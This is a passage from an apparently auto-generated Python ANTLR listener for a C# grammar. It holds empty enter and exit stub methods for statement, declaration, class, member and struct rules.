def exitBlock(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#statement_list.
def enterStatement_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#statement_list.
def exitStatement_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#empty_statement.
def enterEmpty_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#empty_statement.
def exitEmpty_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#labeled_statement.
def enterLabeled_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#labeled_statement.
def exitLabeled_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#declaration_statement.
def enterDeclaration_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#declaration_statement.
def exitDeclaration_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declaration.
def enterLocal_variable_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declaration.
def exitLocal_variable_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_type121.
def enterLocal_variable_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_type121.
def exitLocal_variable_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declarators.
def enterLocal_variable_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declarators.
def exitLocal_variable_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declarator.
def enterLocal_variable_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declarator.
def exitLocal_variable_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_initializer.
def enterLocal_variable_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_initializer.
def exitLocal_variable_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_constant_declaration.
def enterLocal_constant_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_constant_declaration.
def exitLocal_constant_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#expression_statement.
def enterExpression_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#expression_statement.
def exitExpression_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#statement_expression.
def enterStatement_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#statement_expression.
def exitStatement_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#selection_statement.
def enterSelection_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#selection_statement.
def exitSelection_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ifBodyBlock.
def enterIfBodyBlock(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ifBodyBlock.
def exitIfBodyBlock(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ifBodySingle.
def enterIfBodySingle(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ifBodySingle.
def exitIfBodySingle(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#if_statement.
def enterIf_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#if_statement.
def exitIf_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_statement.
def enterSwitch_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_statement.
def exitSwitch_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_block.
def enterSwitch_block(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_block.
def exitSwitch_block(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_sections.
def enterSwitch_sections(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_sections.
def exitSwitch_sections(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_section.
def enterSwitch_section(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_section.
def exitSwitch_section(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_labels.
def enterSwitch_labels(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_labels.
def exitSwitch_labels(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_label.
def enterSwitch_label(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_label.
def exitSwitch_label(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#iteration_statement.
def enterIteration_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#iteration_statement.
def exitIteration_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#while_statement.
def enterWhile_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#while_statement.
def exitWhile_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#do_statement.
def enterDo_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#do_statement.
def exitDo_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#for_statement.
def enterFor_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#for_statement.
def exitFor_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#for_initializer.
def enterFor_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#for_initializer.
def exitFor_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#for_condition.
def enterFor_condition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#for_condition.
def exitFor_condition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#for_iterator.
def enterFor_iterator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#for_iterator.
def exitFor_iterator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#statement_expression_list.
def enterStatement_expression_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#statement_expression_list.
def exitStatement_expression_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#foreach_statement.
def enterForeach_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#foreach_statement.
def exitForeach_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#jump_statement.
def enterJump_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#jump_statement.
def exitJump_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#break_statement.
def enterBreak_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#break_statement.
def exitBreak_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#continue_statement.
def enterContinue_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#continue_statement.
def exitContinue_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#goto_statement.
def enterGoto_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#goto_statement.
def exitGoto_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#return_statement.
def enterReturn_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#return_statement.
def exitReturn_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#throw_statement.
def enterThrow_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#throw_statement.
def exitThrow_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#try_statement.
def enterTry_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#try_statement.
def exitTry_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#catch_clauses.
def enterCatch_clauses(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#catch_clauses.
def exitCatch_clauses(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#specific_catch_clauses.
def enterSpecific_catch_clauses(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#specific_catch_clauses.
def exitSpecific_catch_clauses(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#specific_catch_clause.
def enterSpecific_catch_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#specific_catch_clause.
def exitSpecific_catch_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#general_catch_clause.
def enterGeneral_catch_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#general_catch_clause.
def exitGeneral_catch_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#finally_clause.
def enterFinally_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#finally_clause.
def exitFinally_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#checked_statement.
def enterChecked_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#checked_statement.
def exitChecked_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unchecked_statement.
def enterUnchecked_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unchecked_statement.
def exitUnchecked_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#lock_statement.
def enterLock_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#lock_statement.
def exitLock_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_statement.
def enterUsing_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_statement.
def exitUsing_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#resource_acquisition.
def enterResource_acquisition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#resource_acquisition.
def exitResource_acquisition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#yield_statement.
def enterYield_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#yield_statement.
def exitYield_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#compilation_unit.
def enterCompilation_unit(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#compilation_unit.
def exitCompilation_unit(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_declaration.
def enterNamespace_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_declaration.
def exitNamespace_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#qualified_identifier.
def enterQualified_identifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#qualified_identifier.
def exitQualified_identifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_body.
def enterNamespace_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_body.
def exitNamespace_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#extern_alias_directives.
def enterExtern_alias_directives(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#extern_alias_directives.
def exitExtern_alias_directives(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#extern_alias_directive.
def enterExtern_alias_directive(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#extern_alias_directive.
def exitExtern_alias_directive(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_directives.
def enterUsing_directives(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_directives.
def exitUsing_directives(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_directive.
def enterUsing_directive(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_directive.
def exitUsing_directive(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_alias_directive.
def enterUsing_alias_directive(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_alias_directive.
def exitUsing_alias_directive(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#using_namespace_directive.
def enterUsing_namespace_directive(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#using_namespace_directive.
def exitUsing_namespace_directive(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_member_declarations.
def enterNamespace_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_member_declarations.
def exitNamespace_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_member_declaration.
def enterNamespace_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_member_declaration.
def exitNamespace_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_declaration.
def enterType121_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_declaration.
def exitType121_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#qualified_alias_member.
def enterQualified_alias_member(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#qualified_alias_member.
def exitQualified_alias_member(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_declaration.
def enterClass_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_declaration.
def exitClass_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifiers.
def enterClass_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifiers.
def exitClass_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifier.
def enterClass_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifier.
def exitClass_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter_list.
def enterType121_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter_list.
def exitType121_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameters.
def enterType121_parameters(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameters.
def exitType121_parameters(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter.
def enterType121_parameter(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter.
def exitType121_parameter(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_base.
def enterClass_base(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_base.
def exitClass_base(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_type121_list.
def enterInterface_type121_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_type121_list.
def exitInterface_type121_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter_constraints_clauses.
def enterType121_parameter_constraints_clauses(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter_constraints_clauses.
def exitType121_parameter_constraints_clauses(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter_constraints_clause.
def enterType121_parameter_constraints_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter_constraints_clause.
def exitType121_parameter_constraints_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_parameter_constraints.
def enterType121_parameter_constraints(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_parameter_constraints.
def exitType121_parameter_constraints(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#primary_constraint.
def enterPrimary_constraint(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#primary_constraint.
def exitPrimary_constraint(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#secondary_constraints.
def enterSecondary_constraints(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#secondary_constraints.
def exitSecondary_constraints(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_constraint.
def enterConstructor_constraint(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_constraint.
def exitConstructor_constraint(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_body.
def enterClass_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_body.
def exitClass_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_member_declarations.
def enterClass_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_member_declarations.
def exitClass_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_member_declaration.
def enterClass_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_member_declaration.
def exitClass_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#all_member_modifiers.
def enterAll_member_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#all_member_modifiers.
def exitAll_member_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#all_member_modifier.
def enterAll_member_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#all_member_modifier.
def exitAll_member_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#common_member_declaration.
def enterCommon_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#common_member_declaration.
def exitCommon_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121d_member_declaration.
def enterType121d_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121d_member_declaration.
def exitType121d_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declarators.
def enterConstant_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declarators.
def exitConstant_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declarator.
def enterConstant_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declarator.
def exitConstant_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_declarators.
def enterVariable_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_declarators.
def exitVariable_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_declarator.
def enterVariable_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_declarator.
def exitVariable_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_initializer.
def enterVariable_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_initializer.
def exitVariable_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_declaration.
def enterMethod_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_declaration.
def exitMethod_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_header.
def enterMethod_header(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_header.
def exitMethod_header(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifiers.
def enterMethod_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifiers.
def exitMethod_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifier.
def enterMethod_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifier.
def exitMethod_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#return_type121.
def enterReturn_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#return_type121.
def exitReturn_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_name.
def enterMember_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_name.
def exitMember_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_body.
def enterMethod_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_body.
def exitMethod_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#formal_parameter_list.
def enterFormal_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#formal_parameter_list.
def exitFormal_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_parameters.
def enterFixed_parameters(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_parameters.
def exitFixed_parameters(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_parameter.
def enterFixed_parameter(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_parameter.
def exitFixed_parameter(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#default_argument.
def enterDefault_argument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#default_argument.
def exitDefault_argument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#parameter_modifier.
def enterParameter_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#parameter_modifier.
def exitParameter_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#parameter_array.
def enterParameter_array(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#parameter_array.
def exitParameter_array(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_declaration.
def enterProperty_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_declaration.
def exitProperty_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifiers.
def enterProperty_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifiers.
def exitProperty_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifier.
def enterProperty_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifier.
def exitProperty_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_declarations.
def enterAccessor_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_declarations.
def exitAccessor_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#get_accessor_declaration.
def enterGet_accessor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#get_accessor_declaration.
def exitGet_accessor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#set_accessor_declaration.
def enterSet_accessor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#set_accessor_declaration.
def exitSet_accessor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_modifier.
def enterAccessor_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_modifier.
def exitAccessor_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_body.
def enterAccessor_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_body.
def exitAccessor_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_declaration.
def enterEvent_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_declaration.
def exitEvent_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifiers.
def enterEvent_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifiers.
def exitEvent_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifier.
def enterEvent_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifier.
def exitEvent_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_accessor_declarations.
def enterEvent_accessor_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_accessor_declarations.
def exitEvent_accessor_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#add_accessor_declaration.
def enterAdd_accessor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#add_accessor_declaration.
def exitAdd_accessor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#remove_accessor_declaration.
def enterRemove_accessor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#remove_accessor_declaration.
def exitRemove_accessor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declaration.
def enterIndexer_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declaration.
def exitIndexer_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifiers.
def enterIndexer_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifiers.
def exitIndexer_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifier.
def enterIndexer_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifier.
def exitIndexer_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declarator.
def enterIndexer_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declarator.
def exitIndexer_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declaration.
def enterOperator_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declaration.
def exitOperator_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifiers.
def enterOperator_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifiers.
def exitOperator_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifier.
def enterOperator_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifier.
def exitOperator_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declarator.
def enterOperator_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declarator.
def exitOperator_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unary_operator_declarator.
def enterUnary_operator_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unary_operator_declarator.
def exitUnary_operator_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_unary_operator.
def enterOverloadable_unary_operator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_unary_operator.
def exitOverloadable_unary_operator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#binary_operator_declarator.
def enterBinary_operator_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#binary_operator_declarator.
def exitBinary_operator_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_binary_operator.
def enterOverloadable_binary_operator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_binary_operator.
def exitOverloadable_binary_operator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_operator.
def enterOverloadable_operator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_operator.
def exitOverloadable_operator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#conversion_operator_declarator.
def enterConversion_operator_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#conversion_operator_declarator.
def exitConversion_operator_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_body.
def enterOperator_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_body.
def exitOperator_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declaration.
def enterConstructor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declaration.
def exitConstructor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifiers.
def enterConstructor_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifiers.
def exitConstructor_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifier.
def enterConstructor_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifier.
def exitConstructor_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declarator.
def enterConstructor_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declarator.
def exitConstructor_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_initializer.
def enterConstructor_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_initializer.
def exitConstructor_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_body.
def enterConstructor_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_body.
def exitConstructor_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_declaration.
def enterStatic_constructor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_declaration.
def exitStatic_constructor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_modifiers.
def enterStatic_constructor_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_modifiers.
def exitStatic_constructor_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_body.
def enterStatic_constructor_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_body.
def exitStatic_constructor_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_declaration.
def enterDestructor_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_declaration.
def exitDestructor_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_body.
def enterDestructor_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_body.
def exitDestructor_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#body.
def enterBody(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#body.
def exitBody(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_declaration.
def enterStruct_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_declaration.
def exitStruct_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifiers.
def enterStruct_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifiers.
def exitStruct_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifier.
def enterStruct_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifier.
def exitStruct_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_interfaces.
def enterStruct_interfaces(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_interfaces.
def exitStruct_interfaces(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_body.
